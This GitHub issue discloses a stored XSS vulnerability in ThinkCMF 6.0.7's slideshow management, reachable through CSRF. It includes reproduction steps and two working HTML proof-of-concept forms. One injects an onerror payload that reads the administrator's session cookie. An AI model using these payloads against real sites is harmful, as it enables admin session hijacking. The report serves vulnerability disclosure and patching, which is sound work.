Skip to content

XSS Stored in the Slideshow Management component. #737

Closed
@AleDiBen

Description

@AleDiBen

ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows you to insert HTML tags and JavaScript code in the Name field.

Here are the steps to reproduce the issue.

  1. A remote user tricks the logged in administrator into visiting a malicious site.
  2. The administrator opens the page containing the CSRF payload, injecting the XSS payload into the Slideshow Management (幻灯片管理) page, in the Name (名称) field.
  3. The administrator opens the Slideshow Management (幻灯片管理) page, clicks on Admin Page (管理页面) button and the stored payload is executed.

Note that with this issue a remote user can steal the administrator's session cookie (PHPSESSID).

These are the PoCs I used.

<html>
  <body>
  <h1>CSRF - XSS Stored PoC</h1>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/slide/addPost.html" method="POST">
      <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;0&#41;&gt;" />
      <input type="hidden" name="remark" value="XSS&#32;Stored" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>
<html>
  <body>
  <h1>CSRF - XSS Stored PoC</h1>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/slide/addPost.html" method="POST">
      <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;document.cookie&#41;&gt;" />
      <input type="hidden" name="remark" value="XSS&#32;Stored" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>

Screenshots

XSSPayload
Fig. 1: CSRF that contains an XSS payload


XSSPocExecuted
Fig.2: CSRF payload triggered


XSSPayloadInjected
Fig. 3: XSS payload injected


XSSPayloadExecuted
Fig. 4: XSS triggered


XSSStoredCookieExfiltration
Fig. 5: Reading the PHPSESSID cookie

Metadata

Metadata

Assignees

No one assigned

    Labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions